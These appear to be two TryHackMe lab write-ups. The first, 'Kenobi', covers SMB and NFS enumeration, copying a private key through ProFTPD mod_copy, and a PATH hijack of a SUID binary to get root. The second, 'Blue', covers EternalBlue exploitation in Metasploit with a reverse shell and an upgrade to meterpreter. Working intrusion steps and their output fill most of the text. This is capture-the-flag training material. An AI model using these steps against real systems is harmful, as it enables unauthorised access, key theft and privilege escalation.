BreakBeforeMake

An Electrical Engineer with a passion for Linux and Cyber Security.

@C0gnitiveFl0whttps://breakbeforemake.tech

[Task 1] Deploy the vulnerable machine

Setup bash evironment variable
```
export IP=KENOBI-IP
```
NOTE: where KENOBI-IP is shown throughout this writeup, this refers to the TryHackMe server IP.

Make sure there is a connection to the THM network

ping $IP -c 3

PING KENOBI-IP (KENOBI-IP) 56(84) bytes of data.
64 bytes from KENOBI-IP: icmp_seq=1 ttl=63 time=43.3 ms
64 bytes from KENOBI-IP: icmp_seq=2 ttl=63 time=43.9 ms
64 bytes from KENOBI-IP: icmp_seq=3 ttl=63 time=43.1 ms

--- KENOBI-IP ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 43.110/43.424/43.878/0.328 ms

Scan the machine with nmap

nmap -sC -sV -vvv -oA $PWD/portScan/nmap-initial $IP

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 18:38 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
Initiating Ping Scan at 18:38
Scanning KENOBI-IP [2 ports]
Completed Ping Scan at 18:38, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:38
Completed Parallel DNS resolution of 1 host. at 18:38, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:38
Scanning KENOBI-IP [1000 ports]
Discovered open port 21/tcp on KENOBI-IP
Discovered open port 80/tcp on KENOBI-IP
Discovered open port 139/tcp on KENOBI-IP
Discovered open port 111/tcp on KENOBI-IP
Discovered open port 22/tcp on KENOBI-IP
Discovered open port 445/tcp on KENOBI-IP
Discovered open port 2049/tcp on KENOBI-IP
Completed Connect Scan at 18:38, 0.67s elapsed (1000 total ports)
Initiating Service scan at 18:38
Scanning 7 services on KENOBI-IP
Completed Service scan at 18:38, 11.15s elapsed (7 services on 1 host)
NSE: Script scanning KENOBI-IP.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 1.99s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.23s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
Nmap scan report for KENOBI-IP
Host is up, received syn-ack (0.044s latency).
Scanned at 2020-05-09 18:38:16 EDT for 14s
Not shown: 993 closed ports
Reason: 993 conn-refused
PORT     STATE SERVICE     REASON  VERSION
21/tcp   open  ftp         syn-ack ProFTPD 1.3.5
22/tcp   open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8m00IxH/X5gfu6Cryqi5Ti2TKUSpqgmhreJsfLL8uBJrGAKQApxZ0lq2rKplqVMs+xwlGTuHNZBVeURqvOe9MmkMUOh4ZIXZJ9KNaBoJb27fXIvsS6sgPxSUuaeoWxutGwHHCDUbtqHuMAoSE2Nwl8G+VPc2DbbtSXcpu5c14HUzktDmsnfJo/5TFiRuYR0uqH8oDl6Zy3JSnbYe/QY+AfTpr1q7BDV85b6xP97/1WUTCw54CKUTV25Yc5h615EwQOMPwox94+48JVmgE00T4ARC3l6YWibqY6a5E8BU+fksse35fFCwJhJEk6xplDkeauKklmVqeMysMWdiAQtDj
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBpJvoJrIaQeGsbHE9vuz4iUyrUahyfHhN7wq9z3uce9F+Cdeme1O+vIfBkmjQJKWZ3vmezLSebtW3VRxKKH3n8=
|   256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGB22m99Wlybun7o/h9e6Ea/9kHMT0Dz2GqSodFqIWDi
80/tcp   open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     syn-ack 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      34097/tcp   mountd
|   100005  1,2,3      42895/udp6  mountd
|   100005  1,2,3      49712/udp   mountd
|   100005  1,2,3      54641/tcp6  mountd
|   100021  1,3,4      38881/tcp   nlockmgr
|   100021  1,3,4      42051/tcp6  nlockmgr
|   100021  1,3,4      52158/udp   nlockmgr
|   100021  1,3,4      59194/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     syn-ack 2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 9h38m02s, deviation: 2h53m12s, median: 7h58m01s
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KENOBI<00>           Flags: <unique><active>
|   KENOBI<03>           Flags: <unique><active>
|   KENOBI<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 33364/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 63681/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 58242/udp): CLEAN (Failed to receive data)
|   Check 4 (port 4291/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2020-05-10T01:36:31-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-10T06:36:31
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.46 seconds

Answer = 8

[Task 2] Enumerating Samba for shares

Use nmap to enumerate a machine for SMB shares

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 18:40 EDT
Nmap scan report for KENOBI-IP
Host is up (0.042s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\KENOBI-IP\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\KENOBI-IP\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\KENOBI-IP\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 6.74 seconds

How many shares have been found?

Answer = 3

List files within the SMB directory

smbclient //KENOBI-IP/anonymous
Enter WORKGROUP\c0g's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 06:49:09 2019
  ..                                  D        0  Wed Sep  4 06:56:07 2019
  log.txt                             N    12237  Wed Sep  4 06:49:09 2019

                9204224 blocks of size 1024. 6877104 blocks available

Answer = log.txt

Recursively download the SMB share.

smbget -R smb://KENOBI-IP/anonymous
Password for [c0g] connecting to //anonymous/KENOBI-IP:
Using workgroup WORKGROUP, user c0g
smb://KENOBI-IP/anonymous/log.txt

Downloaded 11.95kB in 3 seconds
 cat log.txt | grep port
# Port 21 is the standard FTP port.
# Don't use IPv6 support by default.
#    behaviour of Samba but the option is considered important
# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
#   wins support = no
# By default, the home directories are exported read-only. Change the

What port is FTP running on? Answer = 21

Enumerate nfs share on port 111

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 21:34 EDT
Nmap scan report for KENOBI-IP
Host is up (0.042s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds

What mount can we see?

Answer = /var

[Task 3] Gain initial access with ProFTPD

Use netcat to connect to the machine on the FTP port.

netcat KENOBI-IP 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [KENOBI-IP ]

Use searchsploit to find exploits for ProFTD

searchsploit ProFTPD 1.3.5

---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - File Copy                     | linux/remote/36742.txt
ProFTPd 1.3.5 - 'mod_copy' Command Execution  | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

What is the version? 1.3.5

Copy Kenobi's private key using SITE CPFR and SITE CPTO commands.
```
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [KENOBI-IP]
350 File or directory exists, ready for destination name
250 Copy successful
```
The /var directory was a mount previously seen; therefore, Kenobi's private key can be moved to /var/tmp.

Mount the /var/tmp directory to the attacking machine

sudo mkdir /mnt/kenobiNFS
sudo mount KENOBI-IP:/var /mnt/kenobiNFS/
ls -la /mnt/kenobiNFS/
total 56
drwxr-xr-x  14 root           root     4096 2019-09-04  2019 .
drwxr-xr-x   3 root           root     4096 2020-05-09 22:06 ..
drwxr-xr-x   2 root           root     4096 2019-09-04  2019 backups
drwxr-xr-x   9 root           root     4096 2019-09-04  2019 cache
drwxrwxrwt   2 root           root     4096 2019-09-04  2019 crash
drwxr-xr-x  40 root           root     4096 2019-09-04  2019 lib
drwxrwsr-x   2 root           staff    4096 2016-04-12  2016 local
lrwxrwxrwx   1 root           root        9 2019-09-04  2019 lock -> /run/lock
drwxrwxr-x  10 root           crontab  4096 2019-09-04  2019 log
drwxrwsr-x   2 root           mail     4096 2019-02-26  2019 mail
drwxr-xr-x   2 root           root     4096 2019-02-26  2019 opt
lrwxrwxrwx   1 root           root        4 2019-09-04  2019 run -> /run
drwxr-xr-x   2 root           root     4096 2019-01-29  2019 snap
drwxr-xr-x   5 root           root     4096 2019-09-04  2019 spool
drwxrwxrwt   6 root           root     4096 2020-05-10 05:49 tmp
drwxr-xr-x   3 root           root     4096 2019-09-04  2019 www

Go to /var/tmp and get the private key to login into Kenobi's account

cp /mnt/kenobiNFS/tmp/id_rsa .

sudo chmod 600 id_rsa
[sudo] password for c0g:

ssh -i id_rsa kenobi@KENOBI-IP
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.

Last login: Sun May 10 05:18:41 2020 from 10.11.1.193
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

cat /home/kenobi/user.txt | wc -c
33

[Task 4] Privilege Escalation with Path Variable Manipulation

Search the system for SUID type files

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
kenobi@kenobi:~$

What file looks particularly out of the ordinary?

Answer = /usr/bin/menu

Run the binary

kenobi@kenobi:~$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
 Enter your choice :

How many options appear? Answer = 3

Use strings to look for anything human readable within the binary

kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-
AWAVA
AUATL
[]A\A]A^A_
 ***************************************
1. status check
2. kernel version
3. ifconfig
 ** Enter your choice :
curl -I localhost
uname -r
ifconfig
.........
output shortened

This shows the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname).

As this file runs as the root users privileges, the environment path can be changed to gain a root shell.

kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

 ***************************************
1. status check
2. kernel version
3. ifconfig
 ** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
kenobi@kenobi:/tmp$ cat /root/root.txt | wc -c
33

Prerequisite

$ export IP=THM_VPN_IP

TASK 1 - RECON

1. Scan the machine

The command below kicks off the nmap scan into a portScan dir output = all formats.

$ sudo nmap -sC -sV -vvv -oA ./portScan/nmap-initial $IP

Nmap scan report for 10.10.0.135
Host is up, received echo-reply ttl 127 (0.050s latency).
Scanned at 2020-04-12 12:48:35 BST for 137s
Not shown: 991 closed ports
Reason: 991 resets
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped   syn-ack ttl 127
|_ssl-date: 2020-04-12T11:49:53+00:00; +1s from scanner time.
49152/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49159/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h15m01s, deviation: 2h30m00s, median: 0s
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:09:52:93:bf:3a (unknown)
| Names:
|   JON-PC<00>           Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   JON-PC<20>           Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   02 09 52 93 bf 3a 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 62444/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 34185/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 22744/udp): CLEAN (Timeout)
|   Check 4 (port 44981/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-04-12T06:49:38-05:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-12T11:49:38
|_  start_date: 2020-04-12T09:42:45
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 12:50:52 2020 -- 1 IP address (1 host up) scanned in 137.96 seconds

2. How many ports are open with a port number under 1000?

135/tcp
139/tcp
445/tcp

The correct answer for this question was 3.

3. What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

As this machine is call Blue, it was safe to assume the answer would be eternal blue which is:

ms-17-010

TASK 2 -GAIN ACCESS

1. Start Metasploit

$ sudo msfdb run

2. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........).

Within metasploit we search for eternal blue to identify all the matching modules.

msf5 > search eternalblue
Matching Modules
================
   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

As can be see from above there are 4No. exploits (#2-5).

The correct answer for this question was #2.

exploit/windows/smb/ms17_010_eternalblue

3. Show options and set the one required value. What is the name of this value? (All caps for submission). Following on from the above command we can determine the answer.

msf5 > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) >

The answer appears to be RHOSTS, however, when entering this into the submission box it was incorrect. The answer they were looking for was RHOST, maybe this was just a glitch in the matrix??

4. Run the exploit.

Before running the exploit we need to set our LHOST and LPORT.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS  THM_VPN_IP
RHOSTS => THM_VPN_IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444

Carrying on our command workflow we attempt to exploit the machine.

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on THM_VPN_IP:4444
[*] THM_VPN_IP:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] THM_VPN_IP:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] THM_VPN_IP:445      - Scanned 1 of 1 hosts (100% complete)
[*] THM_VPN_IP:445 - Connecting to target for exploitation.
[+] THM_VPN_IP:445 - Connection established for exploitation.
[+] THM_VPN_IP:445 - Target OS selected valid for OS indicated by SMB reply
[*] THM_VPN_IP:445 - CORE raw buffer dump (42 bytes)
[*] THM_VPN_IP:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] THM_VPN_IP:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] THM_VPN_IP:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] THM_VPN_IP:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] THM_VPN_IP:445 - Trying exploit with 12 Groom Allocations.
[*] THM_VPN_IP:445 - Sending all but last fragment of exploit packet
[*] THM_VPN_IP:445 - Starting non-paged pool grooming
[+] THM_VPN_IP:445 - Sending SMBv2 buffers
[+] THM_VPN_IP:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] THM_VPN_IP:445 - Sending final SMBv2 buffers.
[*] THM_VPN_IP:445 - Sending last fragment of exploit packet!
[*] THM_VPN_IP:445 - Receiving response from exploit packet
[+] THM_VPN_IP:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] THM_VPN_IP:445 - Sending egg to corrupted connection.
[*] THM_VPN_IP:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (THM_VPN_IP:4444 -> 10.1.0.135:49175) at 2020-04-12 13:50:08 +0100
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C:\Windows\system32>^Z
Background session 1? [y/N]  y

5. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

The exploit came through blank, however, by pressing RETURN we can now see the DOS prompt of the exploited machine indicated above.

TASK 3 - ESCALATION

1. If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected).

C:\Windows\system32>^Z
Background session 1? [y/N]  y

msf5 > grep meterpreter search shell
   273  payload/android/meterpreter_reverse_http                                            normal     No     Android Meterpreter Shell, Reverse HTTP Inline
   274  payload/android/meterpreter_reverse_https                                           normal     No     Android Meterpreter Shell, Reverse HTTPS Inline
   275  payload/android/meterpreter_reverse_tcp                                             normal     No     Android Meterpreter Shell, Reverse TCP Inline
   439  payload/osx/x64/meterpreter/bind_tcp                                                normal     No     OSX Meterpreter, Bind TCP Stager
   440  payload/osx/x64/meterpreter/reverse_tcp                                             normal     No     OSX Meterpreter, Reverse TCP Stager
   459  payload/python/meterpreter_bind_tcp                                                 normal     No     Python Meterpreter Shell, Bind TCP Inline
   460  payload/python/meterpreter_reverse_http                                             normal     No     Python Meterpreter Shell, Reverse HTTP Inline
   461  payload/python/meterpreter_reverse_https                                            normal     No     Python Meterpreter Shell, Reverse HTTPS Inline
   462  payload/python/meterpreter_reverse_tcp                                              normal     No     Python Meterpreter Shell, Reverse TCP Inline
   482  payload/windows/meterpreter/bind_hidden_ipknock_tcp                                 normal     No     Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   483  payload/windows/meterpreter/bind_hidden_tcp                                         normal     No     Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   484  payload/windows/meterpreter_bind_named_pipe                                         normal     No     Windows Meterpreter Shell, Bind Named Pipe Inline
   485  payload/windows/meterpreter_bind_tcp                                                normal     No     Windows Meterpreter Shell, Bind TCP Inline
   486  payload/windows/meterpreter_reverse_http                                            normal     No     Windows Meterpreter Shell, Reverse HTTP Inline
   487  payload/windows/meterpreter_reverse_https                                           normal     No     Windows Meterpreter Shell, Reverse HTTPS Inline
   488  payload/windows/meterpreter_reverse_ipv6_tcp                                        normal     No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
   489  payload/windows/meterpreter_reverse_tcp                                             normal     No     Windows Meterpreter Shell, Reverse TCP Inline
   492  payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp                          normal     No     Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   493  payload/windows/patchupmeterpreter/bind_hidden_tcp                                  normal     No     Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   524  payload/windows/x64/meterpreter_bind_named_pipe                                     normal     No     Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   525  payload/windows/x64/meterpreter_bind_tcp                                            normal     No     Windows Meterpreter Shell, Bind TCP Inline (x64)
   526  payload/windows/x64/meterpreter_reverse_http                                        normal     No     Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   527  payload/windows/x64/meterpreter_reverse_https                                       normal     No     Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   528  payload/windows/x64/meterpreter_reverse_ipv6_tcp                                    normal     No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   529  payload/windows/x64/meterpreter_reverse_tcp                                         normal     No     Windows Meterpreter Shell, Reverse TCP Inline x64
   566  post/multi/manage/shell_to_meterpreter                                              normal     No     Shell to Meterpreter Upgrade
msf5 >

The module required to upgrade a standard shell to a meterpreter session is post/multi/manage/shell_to_meterpreter

2. Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer).

Carrying on our command workflow we select the correct module and list the options.

msf5 > use 566
msf5 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) >

The options required for this module to function is SESSION.

3. Set the required option, you may need to list all of the sessions to find your target here.

msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  THM_VPN_IP:4444 -> 10.10.55.106:49175 (10.10.55.106)

msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1

SESSION => 1

4. Run! If this doesn't work, try completing the exploit from the previous task once more.

msf5 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on THM_VPN_IP:4433
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (180291 bytes) to THM_VPN_IP
